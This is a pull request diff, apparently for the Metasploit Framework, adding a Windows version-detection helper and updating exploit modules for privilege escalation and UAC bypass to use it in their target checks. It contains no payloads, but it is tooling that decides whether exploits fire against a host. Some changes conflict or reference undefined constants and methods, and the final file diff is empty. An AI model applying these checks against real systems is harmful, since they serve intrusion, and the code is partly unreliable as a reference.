### PR TITLE
Add Windows 2000 support for Windows Versioning

### DIFF
--- a/lib/msf/core/post/windows/eventlog.rb
+++ b/lib/msf/core/post/windows/eventlog.rb
@@ -4,6 +4,7 @@ class Post
 module Windows
 
 module Eventlog
+  include Msf::Post::Windows::Version
 
   def initialize(info = {})
     super(
@@ -12,7 +13,6 @@ module Eventlog
         'Compat' => {
           'Meterpreter' => {
             'Commands' => %w[
-              stdapi_sys_config_sysinfo
               stdapi_sys_eventlog_*
             ]
           }
@@ -26,7 +26,8 @@ module Eventlog
   #
   def eventlog_list
     key = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\"
-    if session.sys.config.sysinfo['OS'] =~ /Windows 2003|\.Net|XP|2000/
+    version = get_version_info
+    if version.build_number.between?(Msf::WindowsVersion::Win2000, Msf::WindowsVersion::Server2003_SP2)
       key = "#{key}Eventlog"
     else
       key = "#{key}eventlog"

--- a/lib/msf/core/post/windows/priv.rb
+++ b/lib/msf/core/post/windows/priv.rb
@@ -3,6 +3,7 @@
 module Msf::Post::Windows::Priv
   include ::Msf::Post::Windows::Accounts
   include Msf::Post::Windows::Registry
+  include Msf::Post::Windows::Version
   include Msf::Util::WindowsCryptoHelpers
 
   INTEGRITY_LEVEL_SID = {

--- a/lib/msf/core/post/windows/priv.rb
+++ b/lib/msf/core/post/windows/priv.rb
@@ -138,9 +138,8 @@ module Msf::Post::Windows::Priv
   #
   def is_uac_enabled?
     uac = false
-    winversion = session.sys.config.sysinfo['OS']
-
-    if winversion =~ /Windows (Vista|7|8|2008|2012|10|2016|2019)/
+    version = get_version_info
+    if version.build_number >= Msf::WindowsVersion::Vista_SP0
       unless is_system?
         begin
           enable_lua = registry_getvaldata(

--- a/lib/msf/core/post/windows/task_scheduler.rb
+++ b/lib/msf/core/post/windows/task_scheduler.rb
@@ -263,20 +263,19 @@ module Msf
 
         def check_compatibility
           # Check Windows version to make sure we will use the correct supported command flags
-          # - `schtasks.exe` on Windows prior to Windows Server 2003 SP2 has
+          # - `schtasks.exe` on Windows prior to Windows Server 2003 SP1 has
           #   some different `/create` option flags.
-          # - `schtasks.exe` on Windows until Server 2003 SP2 has some
-          #   different `/query` option flags.
+          # - `schtasks.exe` on Windows prior to Vista has some
+          #   different `/query` option flags - set @old_os to true
           # Also, on these OSes, `reg.exe` does not support the `/reg:64` flag.
+
           @old_schtasks = false
           @old_os = false
-          return unless sysinfo
-          match = sysinfo['OS'].match(/(?<version>[\d.]+) Build/)
-          return unless match
 
-          if Rex::Version.new((match[:version])) < Rex::Version.new('6.0')
+          version = get_version_info
+          if version.build_number < Msf::WindowsVersion::Vista_SP0
             @old_os = true
-            unless sysinfo['OS'].include?('5.2 Build 3790, Service Pack 2')
+            if version.build_number < Msf::WindowsVersion::Server2003_SP1
               @old_schtasks = true
             end
             if datastore['ScheduleRemoteSystem'].present?

--- a/lib/msf/core/post/windows/version.rb
+++ b/lib/msf/core/post/windows/version.rb
@@ -1,0 +1,67 @@
+# -*- coding: binary -*-
+
+module Msf::Post::Windows::Version
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Compat' => {
+          'Meterpreter' => {
+            'Commands' => %w[
+              stdapi_railgun_api
+            ]
+          }
+        }
+      )
+    )
+  end
+
+  def get_version_info
+    if session.type == 'meterpreter'
+      result = session.railgun.ntdll.RtlGetVersion(input_os_version_info_ex)
+      os_version_info_ex = unpack_version_info(result['VersionInformation'])
+      major = os_version_info_ex[1]
+      minor = os_version_info_ex[2]
+      build = os_version_info_ex[3]
+      service_pack = os_version_info_ex[6]
+      product_type = os_version_info_ex[9]
+
+      Msf::WindowsVersion.new(major, minor, build, service_pack, product_type)
+    else
+    end
+  end
+
+  private
+
+  def empty_os_version_info_ex
+    result = [0,
+     0,
+     0,
+     0,
+     0,
+     "",
+     0,
+     0,
+     0,
+     0,
+     0
+    ]
+  end
+
+  def pack_version_info(info)
+    info.pack('VVVVVa256vvvCC')
+  end
+
+  def unpack_version_info(bytes)
+    bytes.unpack('VVVVVa256vvvCC')
+  end
+
+  def input_os_version_info_ex
+    input = empty_os_version_info_ex
+    size = pack_version_info(input).size
+    input[0] = size
+
+    pack_version_info(input)
+  end
+end

--- a/lib/msf/core/post/windows/version.rb
+++ b/lib/msf/core/post/windows/version.rb
@@ -30,7 +30,13 @@ module Msf::Post::Windows::Version
       Msf::WindowsVersion.new(major, minor, build, service_pack, product_type)
     else
       build_num_raw = cmd_exec('systeminfo')
-      bn_groups = build_num_raw.match(/OS Version:\s+(\d+)\.(\d+)\.(\d+).*((Service Pack\s+(\d+))|N\/A)/)
+      if build_num_raw.include?('not recognized') # Windows 2K and earlier do not have systeminfo
+        build_num_raw = cmd_exec('ver') # This works on 98 and up, but no SP data.
+        bn_groups = build_num_raw.match(/.*Version\s+(\d+)\.(\d+)\.(\d+)/)
+      else
+        bn_groups = build_num_raw.match(/OS Version:\s+(\d+)\.(\d+)\.(\d+).*((Service Pack\s+(\d+))|N\/A)/)
+      end
+
       if bn_groups.nil?
         print_error("Couldn't retrieve the target's build number!")
         raise RuntimeError.new("Couldn't retrieve the target's build number!")

--- a/lib/msf/core/post/windows/version.rb
+++ b/lib/msf/core/post/windows/version.rb
@@ -29,6 +29,31 @@ module Msf::Post::Windows::Version
 
       Msf::WindowsVersion.new(major, minor, build, service_pack, product_type)
     else
+      build_num_raw = cmd_exec('systeminfo')
+      bn_groups = build_num_raw.match(/OS Version:\s+(\d+)\.(\d+)\.(\d+).*((Service Pack\s+(\d+))|N\/A)/)
+      if bn_groups.nil?
+        print_error("Couldn't retrieve the target's build number!")
+      else
+        sp = bn_groups[6]
+        sp = 0 if sp.nil?
+        workstation = 'Standalone Workstation'
+        dc = 'Domain Controller'
+        server = 'Standalone Server'
+        product_regex_output = build_num_raw.match(/((#{workstation})|(#{dc})|(#{server}))/)
+        if product_regex_output.nil?
+          product_type = Msf::WindowsVersion::UnknownProduct
+        else
+          case product_regex_output[1]
+          when workstation
+            product_type = Msf::WindowsVersion::VER_NT_WORKSTATION
+          when dc
+            product_type = Msf::WindowsVersion::VER_NT_DOMAIN_CONTROLLER
+          when server
+            product_type = Msf::WindowsVersion::VER_NT_SERVER
+          end
+        end
+        Msf::WindowsVersion.new(bn_groups[1].to_i, bn_groups[2].to_i, bn_groups[3].to_i, sp, product_type)
+      end
     end
   end
 

--- a/lib/msf/core/post/windows/version.rb
+++ b/lib/msf/core/post/windows/version.rb
@@ -30,8 +30,8 @@ module Msf::Post::Windows::Version
       Msf::WindowsVersion.new(major, minor, build, service_pack, product_type)
     else
       build_num_raw = cmd_exec('systeminfo')
-      if build_num_raw.include?('not recognized') # Windows 2K and earlier do not have systeminfo
-        build_num_raw = cmd_exec('ver') # This works on 98 and up, but no SP data.
+      unless build_num_raw.include?('OS Version:') # Windows 2K and earlier do not have systeminfo
+        build_num_raw = cmd_exec('ver') # This works on (at least) 98 and up, but no SP data.
         bn_groups = build_num_raw.match(/.*Version\s+(\d+)\.(\d+)\.(\d+)/)
       else
         bn_groups = build_num_raw.match(/OS Version:\s+(\d+)\.(\d+)\.(\d+).*((Service Pack\s+(\d+))|N\/A)/)

--- a/lib/msf/core/post/windows/version.rb
+++ b/lib/msf/core/post/windows/version.rb
@@ -33,6 +33,7 @@ module Msf::Post::Windows::Version
       bn_groups = build_num_raw.match(/OS Version:\s+(\d+)\.(\d+)\.(\d+).*((Service Pack\s+(\d+))|N\/A)/)
       if bn_groups.nil?
         print_error("Couldn't retrieve the target's build number!")
+        raise RuntimeError.new("Couldn't retrieve the target's build number!")
       else
         sp = bn_groups[6]
         sp = 0 if sp.nil?

--- a/lib/msf/core/windows_version.rb
+++ b/lib/msf/core/windows_version.rb
@@ -1,4 +1,5 @@
 # -*- coding: binary -*-
+
 module Msf
   #
   # Represents the version of a Windows operating system
@@ -42,28 +43,28 @@ module Msf
     Win11_22H2 = Rex::Version.new('10.0.22621.0')
 
     module MajorRelease
-      NT351 = "Windows NT 3.51"
-      Win95 = "Windows 95"
-      Win98 = "Windows 98"
-      WinME = "Windows ME"
+      NT351 = 'Windows NT 3.51'.freeze
+      Win95 = 'Windows 95'.freeze
+      Win98 = 'Windows 98'.freeze
+      WinME = 'Windows ME'.freeze
 
-      XP = "Windows XP"
-      Server2003 = "Windows Server 2003"
+      XP = 'Windows XP'.freeze
+      Server2003 = 'Windows Server 2003'.freeze
 
-      Vista = "Windows Vista"
-      Server2008 = "Windows Server 2008"
-      
-      Win7 = "Windows 7"
-      Server2008R2 = "Windows 2008 R2"
+      Vista = 'Windows Vista'.freeze
+      Server2008 = 'Windows Server 2008'.freeze
 
-      Win8 = "Windows 8"
-      Server2012 = "Windows Server 2012"
+      Win7 = 'Windows 7'.freeze
+      Server2008R2 = 'Windows 2008 R2'.freeze
 
-      Win81 = "Windows 8.1"
-      Server2012R2 = "Windows Server 2012 R2"
+      Win8 = 'Windows 8'.freeze
+      Server2012 = 'Windows Server 2012'.freeze
 
-      Win10Plus = "Windows 10+"
-      Server2016Plus = "Windows Server 2016+"
+      Win81 = 'Windows 8.1'.freeze
+      Server2012R2 = 'Windows Server 2012 R2'.freeze
+
+      Win10Plus = 'Windows 10+'.freeze
+      Server2016Plus = 'Windows Server 2016+'.freeze
     end
 
     def initialize(major, minor, build, service_pack, product_type)
@@ -80,24 +81,25 @@ module Msf
     end
 
     # Is this OS a Windows Server instance?
-    def is_windows_server
+    def windows_server?
       # There are other types than just workstation/server/DC, but Microsoft's own documentation says
       # "If it's not Workstation, then it's Server"
       # https://learn.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-osversioninfoexa
-      self.product_type != VER_NT_WORKSTATION
+      product_type != VER_NT_WORKSTATION
     end
 
     # This Windows Server has been promoted to a DC
-    def is_domain_controller
-      self.product_type == VER_NT_DOMAIN_CONTROLLER
+    def domain_controller?
+      product_type == VER_NT_DOMAIN_CONTROLLER
     end
 
     # The name of the OS, as it is most commonly rendered. Includes
     def product_name
-      result = "Unknown Windows version: #{self._major}.#{self._minor}.#{self._build}"
-      result = major_release_name
-      result = "#{result} Service Pack #{self._service_pack}" if self.service_pack != 0
-      result = "#{result} Build #{self._build}" if build_number >= Win10Plus
+      result = "Unknown Windows version: #{_major}.#{_minor}.#{_build}"
+      name = major_release_name
+      result = major_release_name unless name.nil?
+      result = "#{result} Service Pack #{_service_pack}" if service_pack != 0
+      result = "#{result} Build #{_build}" if build_number >= Win10Plus
 
       result
     end
@@ -107,18 +109,18 @@ module Msf
     end
 
     # Is this version number from the Vista/Server 2008 generation of Windows OSes
-    def is_vista_or_2008
-      self.build_number.between?(Vista_SP0, Vista_SP2)
+    def vista_or_2008?
+      build_number.between?(Vista_SP0, Vista_SP2)
     end
 
     # Is this version number from the Windows 7/Server 2008 R2 generation of Windows OSes
-    def is_win7_or_2008r2
-      self.build_number.between?(Win7_SP0, Win7_SP1)
+    def win7_or_2008r2?
+      build_number.between?(Win7_SP0, Win7_SP1)
     end
 
     # Is this version number from the XP/Server 2003 generation of Windows OSes
-    def is_xp_or_2003
-      self.build_number.between?(XP_SP0, Server2003_SP2)
+    def xp_or_2003?
+      build_number.between?(XP_SP0, Server2003_SP2)
     end
 
     attr_accessor :_major, :_minor, :_build, :_service_pack, :product_type
@@ -127,30 +129,36 @@ module Msf
 
     # The major release within which this build fits
     def major_release_name
-      if self._major == 5
-        if self._minor == 1
+      if _major == 5
+        if _minor == 1
           return MajorRelease::XP
-        elsif self._minor == 2
-          return MajorRelease::Server2003 if is_windows_server
+        elsif _minor == 2
+          return MajorRelease::Server2003 if windows_server?
+
           return MajorRelease::XP
         end
-      elsif self._major == 6
-        if self._minor == 0
-          return MajorRelease::Server2008 if is_windows_server
+      elsif _major == 6
+        if _minor == 0
+          return MajorRelease::Server2008 if windows_server?
+
           return MajorRelease::Vista
-        elsif self._minor == 1
-          return MajorRelease::Server2008R2 if is_windows_server
+        elsif _minor == 1
+          return MajorRelease::Server2008R2 if windows_server?
+
           return MajorRelease::Win7
-        elsif self._minor == 2
-          return MajorRelease::Server2008R2 if is_windows_server
+        elsif _minor == 2
+          return MajorRelease::Server2008R2 if windows_server?
+
           return MajorRelease::Win8
-        elsif self._minor == 3
-          return MajorRelease::Server2008R2 if is_windows_server
+        elsif _minor == 3
+          return MajorRelease::Server2008R2 if windows_server?
+
           return MajorRelease::Win81
         end
-      elsif self._major == 10
-        if self._minor == 0
-          return MajorRelease::Server2016Plus if is_windows_server
+      elsif _major == 10
+        if _minor == 0
+          return MajorRelease::Server2016Plus if windows_server?
+
           return MajorRelease::Win10Plus
         end
       end

--- a/lib/msf/core/windows_version.rb
+++ b/lib/msf/core/windows_version.rb
@@ -51,6 +51,7 @@ module Msf
       WinME = 'Windows ME'.freeze
 
       XP = 'Windows XP'.freeze
+      Win2000 = 'Windows 2000'.freeze
       Server2003 = 'Windows Server 2003'.freeze
 
       Vista = 'Windows Vista'.freeze
@@ -137,8 +138,10 @@ module Msf
     # The major release within which this build fits
     def major_release_name
       if _major == 5
-        if _minor == 1
-          return MajorRelease::XP
+        if _minor == 0
+          return MajorRelease::Win2000
+        elsif _minor == 1
+            return MajorRelease::XP
         elsif _minor == 2
           return MajorRelease::Server2003 if windows_server?
 

--- a/lib/msf/core/windows_version.rb
+++ b/lib/msf/core/windows_version.rb
@@ -38,7 +38,7 @@ module Msf
     Win10_20H2 = Rex::Version.new('10.0.19042.0')
     Win10_21H1 = Rex::Version.new('10.0.19043.0')
     Win10_21H2 = Rex::Version.new('10.0.19044.0')
-    Win10_22H2 = Rex::Version.new('10.0.19044.0')
+    Win10_22H2 = Rex::Version.new('10.0.19045.0')
     Server2022 = Rex::Version.new('10.0.20348.0')
     Win11_21H2 = Rex::Version.new('10.0.22000.0')
     Win11_22H2 = Rex::Version.new('10.0.22621.0')

--- a/lib/msf/core/windows_version.rb
+++ b/lib/msf/core/windows_version.rb
@@ -90,6 +90,10 @@ module Msf
       product_type != VER_NT_WORKSTATION
     end
 
+    def workstation?
+      product_type == VER_NT_WORKSTATION
+    end
+
     # This Windows Server has been promoted to a DC
     def domain_controller?
       product_type == VER_NT_DOMAIN_CONTROLLER

--- a/lib/msf/core/windows_version.rb
+++ b/lib/msf/core/windows_version.rb
@@ -90,6 +90,7 @@ module Msf
       product_type != VER_NT_WORKSTATION
     end
 
+    # Is this a Workstation build?
     def workstation?
       product_type == VER_NT_WORKSTATION
     end
@@ -99,11 +100,11 @@ module Msf
       product_type == VER_NT_DOMAIN_CONTROLLER
     end
 
-    # The name of the OS, as it is most commonly rendered. Includes
+    # The name of the OS, as it is most commonly rendered. Includes Service Pack if present, or build number if Win10 or higher.
     def product_name
       result = "Unknown Windows version: #{_major}.#{_minor}.#{_build}"
       name = major_release_name
-      result = major_release_name unless name.nil?
+      result = name unless name.nil?
       result = "#{result} Service Pack #{_service_pack}" if _service_pack != 0
       result = "#{result} Build #{_build}" if build_number >= Win10_InitialRelease
 
@@ -129,9 +130,9 @@ module Msf
       build_number.between?(XP_SP0, Server2003_SP2)
     end
 
-    attr_accessor :_major, :_minor, :_build, :_service_pack, :product_type
-
     private
+
+    attr_accessor :_major, :_minor, :_build, :_service_pack, :product_type
 
     # The major release within which this build fits
     def major_release_name

--- a/lib/msf/core/windows_version.rb
+++ b/lib/msf/core/windows_version.rb
@@ -1,0 +1,168 @@
+# -*- coding: binary -*-
+module Msf
+  #
+  # Represents the version of a Windows operating system
+  #
+  class WindowsVersion
+
+    VER_NT_WORKSTATION = 1
+    VER_NT_DOMAIN_CONTROLLER = 2
+    VER_NT_SERVER = 3
+
+    class MajorRelease
+
+      def initialize(name, enum)
+        @name = name
+        @enum = enum
+      end
+
+      def to_s
+        @name
+      end
+
+      def >(other)
+        @enum > other.enum
+      end
+
+      def <(other)
+        @enum < other.enum
+      end
+
+      def ==(other)
+        @enum == other.enum
+      end
+
+      def >=(other)
+        @enum >= other.enum
+      end
+
+      def <=(other)
+        @enum <= other.enum
+      end
+
+      attr_reader :name, :enum
+
+      NT351 = MajorRelease.new("Windows NT 3.51", 1)
+      Win95 = MajorRelease.new("Windows 95",2)
+      Win98 = MajorRelease.new("Windows 98",3)
+      WinME = MajorRelease.new("Windows ME",4)
+
+      XP = MajorRelease.new("Windows XP",5)
+      Server2003 = MajorRelease.new("Windows Server 2003",5)
+
+      Vista = MajorRelease.new("Windows Vista",6)
+      Server2008 = MajorRelease.new("Windows Server 2008",6)
+      
+      Win7 = MajorRelease.new("Windows 7",7)
+      Server2008R2 = MajorRelease.new("Windows 2008 R2",7)
+
+      Win8 = MajorRelease.new("Windows 8",8)
+      Server2012 = MajorRelease.new("Windows Server 2012",8)
+
+      Win81 = MajorRelease.new("Windows 8.1",9)
+      Server2012R2 = MajorRelease.new("Windows Server 2012 R2",9)
+
+      Win10Plus = MajorRelease.new("Windows 10+",10)
+      Server2016Plus = MajorRelease.new("Windows Server 2016+",10)
+    end
+
+    def initialize(major, minor, build, service_pack, product_type)
+      self.major = major
+      self.minor = minor
+      self.build = build
+      self.service_pack = service_pack
+      self.product_type = product_type
+    end
+
+    def build_number
+      Rex::Version.new("#{major}.#{minor}.#{build}.#{service_pack}")
+    end
+
+    def is_windows_server
+      self.product_type != VER_NT_WORKSTATION
+    end
+
+    def is_domain_controller
+      self.product_type == VER_NT_DOMAIN_CONTROLLER
+    end
+
+    def major_release
+      if self.major == 5
+        if self.minor == 1
+          return MajorRelease::XP
+        elsif self.minor == 2
+          return MajorRelease::Server2003 if is_windows_server
+          return MajorRelease::XP
+        end
+      elsif self.major == 6
+        if self.minor == 0
+          return MajorRelease::Server2008 if is_windows_server
+          return MajorRelease::Vista
+        elsif self.minor == 1
+          return MajorRelease::Server2008R2 if is_windows_server
+          return MajorRelease::Server2008R2
+        elsif self.minor == 2
+          return MajorRelease::Server2008R2 if is_windows_server
+          return MajorRelease::Server2008R2
+        elsif self.minor == 3
+          return MajorRelease::Server2008R2 if is_windows_server
+          return MajorRelease::Server2008R2
+        end
+      elsif self.major == 10
+        if self.minor == 0
+          return MajorRelease::Server2016Plus if is_windows_server
+          return MajorRelease::Win10Plus
+        end
+      end
+      return nil
+    end
+
+    def product_name
+      result = "Unknown Windows version: #{self.major}.#{self.minor}.#{self.build}"
+      result = major_release.name unless major_release.nil?
+      result = "#{result} Service Pack #{self.service_pack}" if self.service_pack != 0
+      result = "#{result} Build #{self.build}" if major_release >= MajorRelease::Win10Plus
+
+      result
+    end
+
+    def to_s
+      product_name
+    end
+
+    XP_SP0 = Rex::Version.new('5.1.2600.0')
+    XP_SP1 = Rex::Version.new('5.1.2600.1')
+    XP_SP2 = Rex::Version.new('5.1.2600.2')
+    XP_SP3 = Rex::Version.new('5.1.2600.3')
+    Server2003_SP0 = Rex::Version.new('5.2.3790.0')
+    Server2003_SP1 = Rex::Version.new('5.2.3790.1')
+    Server2003_SP2 = Rex::Version.new('5.2.3790.2')
+    Vista_SP0 = Server2008_SP0 = Rex::Version.new('6.0.6000.0')
+    Vista_SP1 = Server2008_SP1 = Rex::Version.new('6.0.6001.1')
+    Vista_SP2 = Server2008_SP2 = Rex::Version.new('6.0.6002.2')
+    Win7_SP0 = Server2008_R2_SP0 = Rex::Version.new('6.1.7600.0')
+    Win7_SP1 = Server2008_R2_SP1 = Rex::Version.new('6.1.7601.1')
+    Win8 = Server2012 = Rex::Version.new('6.2.9200.0')
+    Win81 = Server2012_R2 = Rex::Version.new('6.3.9600.0')
+    Win10_1507 = Win10_InitialRelease = Rex::Version.new('10.0.10240.0')
+    Win10_1511 = Rex::Version.new('10.0.10586.0')
+    Win10_1607 = Server2016 = Rex::Version.new('10.0.14393.0')
+    Win10_1703 = Rex::Version.new('10.0.15063.0')
+    Win10_1709 = Rex::Version.new('10.0.16299.0')
+    Win10_1803 = Rex::Version.new('10.0.17134.0')
+    Win10_1809 = Server2019 = Rex::Version.new('10.0.17763.0')
+    Win10_1903 = Rex::Version.new('10.0.18362.0')
+    Win10_1909 = Rex::Version.new('10.0.18363.0')
+    Win10_2004 = Rex::Version.new('10.0.19041.0')
+    Win10_20H2 = Rex::Version.new('10.0.19042.0')
+    Win10_21H1 = Rex::Version.new('10.0.19043.0')
+    Win10_21H2 = Rex::Version.new('10.0.19044.0')
+    Win10_22H2 = Rex::Version.new('10.0.19044.0')
+    Server2022 = Rex::Version.new('10.0.20348.0')
+    Win11_21H2 = Rex::Version.new('10.0.22000.0')
+    Win11_22H2 = Rex::Version.new('10.0.22621.0')
+
+    
+    attr_accessor :major, :minor, :build, :service_pack, :product_type
+  end
+end

--- a/lib/msf/core/windows_version.rb
+++ b/lib/msf/core/windows_version.rb
@@ -9,6 +9,7 @@ module Msf
     VER_NT_WORKSTATION = 1
     VER_NT_DOMAIN_CONTROLLER = 2
     VER_NT_SERVER = 3
+    UnknownProduct = -1
 
     XP_SP0 = Rex::Version.new('5.1.2600.0')
     XP_SP1 = Rex::Version.new('5.1.2600.1')
@@ -98,8 +99,8 @@ module Msf
       result = "Unknown Windows version: #{_major}.#{_minor}.#{_build}"
       name = major_release_name
       result = major_release_name unless name.nil?
-      result = "#{result} Service Pack #{_service_pack}" if service_pack != 0
-      result = "#{result} Build #{_build}" if build_number >= Win10Plus
+      result = "#{result} Service Pack #{_service_pack}" if _service_pack != 0
+      result = "#{result} Build #{_build}" if build_number >= Win10_InitialRelease
 
       result
     end
@@ -147,11 +148,11 @@ module Msf
 
           return MajorRelease::Win7
         elsif _minor == 2
-          return MajorRelease::Server2008R2 if windows_server?
+          return MajorRelease::Server2012 if windows_server?
 
           return MajorRelease::Win8
         elsif _minor == 3
-          return MajorRelease::Server2008R2 if windows_server?
+          return MajorRelease::Server2012R2 if windows_server?
 
           return MajorRelease::Win81
         end

--- a/lib/msf/core/windows_version.rb
+++ b/lib/msf/core/windows_version.rb
@@ -11,6 +11,7 @@ module Msf
     VER_NT_SERVER = 3
     UnknownProduct = -1
 
+    Win2000 = Rex::Version.new('5.0.2195')
     XP_SP0 = Rex::Version.new('5.1.2600.0')
     XP_SP1 = Rex::Version.new('5.1.2600.1')
     XP_SP2 = Rex::Version.new('5.1.2600.2')

--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/windows/def_ntdll.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/windows/def_ntdll.rb
@@ -129,6 +129,10 @@ class Def_windows_ntdll
       ["PDWORD","BuildNumber","inout"]
     ])
 
+    dll.add_function('RtlGetVersion', 'VOID',[
+      ["PBLOB","VersionInformation","inout"]
+    ])
+
     dll.add_function('RtlInitAnsiString', 'VOID',[
       ["PBLOB","DestinationString","inout"],
       ["PBLOB","SourceString","inout"],

--- a/modules/exploits/windows/local/alpc_taskscheduler.rb
+++ b/modules/exploits/windows/local/alpc_taskscheduler.rb
@@ -79,7 +79,8 @@ class MetasploitModule < Msf::Exploit::Local
       fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
     end
 
-    if sysinfo['OS'] =~ /XP/
+    version = get_version_info
+    if version.xp_or_2003? && version.workstation?
       fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')
     end
   end

--- a/modules/exploits/windows/local/appxsvc_hard_link_privesc.rb
+++ b/modules/exploits/windows/local/appxsvc_hard_link_privesc.rb
@@ -54,9 +54,9 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check
     version = get_version_info
-    if version.build_number.between?(Msf::WindowsVersion::Win10_1507, Msf::WindowsVersion::Win10_1803)
+    if version.build_number.between?(Msf::WindowsVersion::Win10_InitialVersion, Msf::WindowsVersion::Win10_1803)
       return CheckCode::Appears
-    elsif version.major_release >= Msf::WindowsVersion::MajorRelease::Win10Plus
+    elsif version.build_number >= Msf::WindowsVersion::Win10_InitialVersion
       return CheckCode::Detected
     end
 

--- a/modules/exploits/windows/local/appxsvc_hard_link_privesc.rb
+++ b/modules/exploits/windows/local/appxsvc_hard_link_privesc.rb
@@ -54,9 +54,9 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check
     version = get_version_info
-    if version.build_number.between?(Msf::WindowsVersion::Win10_InitialVersion, Msf::WindowsVersion::Win10_1803)
+    if version.build_number.between?(Msf::WindowsVersion::Win10_InitialRelease, Msf::WindowsVersion::Win10_1803)
       return CheckCode::Appears
-    elsif version.build_number >= Msf::WindowsVersion::Win10_InitialVersion
+    elsif version.build_number >= Msf::WindowsVersion::Win10_InitialRelease
       return CheckCode::Detected
     end
 

--- a/modules/exploits/windows/local/appxsvc_hard_link_privesc.rb
+++ b/modules/exploits/windows/local/appxsvc_hard_link_privesc.rb
@@ -41,6 +41,8 @@ class MetasploitModule < Msf::Exploit::Local
           [ 'URL', 'https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html' ],
           [ 'URL', 'https://0x00-0x00.github.io/research/2019/05/30/Coding-a-reliable-CVE-2019-0841-Bypass.html' ]
         ],
+      'Platform'       => 'win',
+      'SessionTypes'   => [ 'meterpreter' ],
       'Targets'        =>
         [
           [ 'Windows 10', { 'Platform' => 'win' } ]
@@ -51,13 +53,14 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    return CheckCode::Unknown if sysinfo['OS'] !~ /windows\s10/i
+    version = get_version_info
+    if version.build_number.between?(Msf::WindowsVersion::Win10_1507, Msf::WindowsVersion::Win10_1803)
+      return CheckCode::Appears
+    elsif version.major_release >= Msf::WindowsVersion::MajorRelease::Win10Plus
+      return CheckCode::Detected
+    end
 
-    path = expand_path('%WINDIR%\\system32\\win32k.sys')
-    major, minor, build, revision, brand = file_version(path)
-    return CheckCode::Appears if build < 17763
-
-    CheckCode::Detected
+    return CheckCode::Unknown
   end
 
   def upload_file(file_name, file_path)
@@ -122,7 +125,9 @@ class MetasploitModule < Msf::Exploit::Local
     folder_path = expand_path("%TEMP%\\etw")
     dir_rm(folder_path)
 
-    write_file(@rtf_path, @original_data)
+    unless @rtf_path.nil?
+      write_file(@rtf_path, @original_data)
+    end
     super
   end
 end

--- a/modules/exploits/windows/local/bits_ntlm_token_impersonation.rb
+++ b/modules/exploits/windows/local/bits_ntlm_token_impersonation.rb
@@ -152,11 +152,10 @@ class MetasploitModule < Msf::Exploit::Local
   #   - Checks if the session is not already SYSTEM
   def check
     privs = client.sys.config.getprivs
-    os = client.sys.config.sysinfo['OS']
-
+    version = get_version_info
     # Fast fails
-    if os.include?('Windows 7') || os.include?('Windows XP')
-      print_bad("Operating system: #{os}")
+    if version.build_number < Msf::WindowsVersion::Win8 && !version.windows_server?
+      print_bad("Operating system: #{version.product_name}")
       print_bad('BITS behavior on Windows 7 and previous has not been shown vulnerable.')
       return Exploit::CheckCode::Safe
     end

--- a/modules/exploits/windows/local/bthpan.rb
+++ b/modules/exploits/windows/local/bthpan.rb
@@ -136,8 +136,8 @@ class MetasploitModule < Msf::Exploit::Local
       return Exploit::CheckCode::Safe
     end
 
-    os = sysinfo["OS"]
-    return Exploit::CheckCode::Safe unless os =~ /windows xp.*service pack 3/i
+    version = get_version_info
+    return Exploit::CheckCode::Safe unless version.build_number == Msf::WindowsVersion::XP_SP3
 
     handle = open_device("\\\\.\\bthpan", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
     return Exploit::CheckCode::Safe unless handle

--- a/modules/exploits/windows/local/bypassuac.rb
+++ b/modules/exploits/windows/local/bypassuac.rb
@@ -163,10 +163,9 @@ class MetasploitModule < Msf::Exploit::Local
     #
     # Verify use against Vista+
     #
-    winver = sysinfo['OS']
-
-    unless winver =~ /Windows Vista|Windows 2008|Windows [78]/
-      fail_with(Failure::NotVulnerable, "#{winver} is not vulnerable.")
+    version = get_version_info
+    unless version.build_number >= Msf::WindowsVersion::Vista_SP0
+      fail_with(Failure::NotVulnerable, "#{version.product_name} is not vulnerable.")
     end
 
     if is_uac_enabled?

--- a/modules/exploits/windows/local/bypassuac.rb
+++ b/modules/exploits/windows/local/bypassuac.rb
@@ -164,7 +164,7 @@ class MetasploitModule < Msf::Exploit::Local
     # Verify use against Vista+
     #
     version = get_version_info
-    unless version.build_number >= Msf::WindowsVersion::Vista_SP0
+    unless version.build_number.between?(Msf::WindowsVersion::Vista_SP0, Msf::WindowsVersion::Win81)
       fail_with(Failure::NotVulnerable, "#{version.product_name} is not vulnerable.")
     end
 

--- a/modules/exploits/windows/local/bypassuac_comhijack.rb
+++ b/modules/exploits/windows/local/bypassuac_comhijack.rb
@@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Local
   include Post::Windows::Priv
   include Post::Windows::Registry
   include Post::Windows::Runas
+  include Post::Windows::Version
   include Exploit::FileDropper
 
   CLSID_PATH = 'HKCU\\Software\\Classes\\CLSID'.freeze
@@ -69,24 +70,11 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    vprint_status("System OS Detected: #{sysinfo['OS']}")
+    version_info = get_version_info
+    vprint_status("System OS Detected: #{version_info.product}")
     # return CheckCode::Safe('UAC is not enabled') unless is_uac_enabled?
-    if sysinfo['OS'] =~ /Windows (7|8|2008|2012)/
+    if version_info.build_number.between?(Msf::WindowsVersion::Win7, Msf::WindowsVersion::Win10_1903)
       return CheckCode::Appears
-    end
-
-    if sysinfo['OS'] =~ /Windows (10|2016)/
-      sysinfo_value = sysinfo['OS']
-      build_num_arr = sysinfo_value.split('Build')
-      return CheckCode::Safe('Unable to determine build Number') if build_num_arr.length < 2
-
-      build_num = build_num_arr[1].to_i
-      vprint_status("Detected build number: #{build_num}")
-      if build_num < 18362
-        return CheckCode::Appears
-      else
-        return CheckCode::Safe
-      end
     end
     return CheckCode::Safe
   end

--- a/modules/exploits/windows/local/bypassuac_dotnet_profiler.rb
+++ b/modules/exploits/windows/local/bypassuac_dotnet_profiler.rb
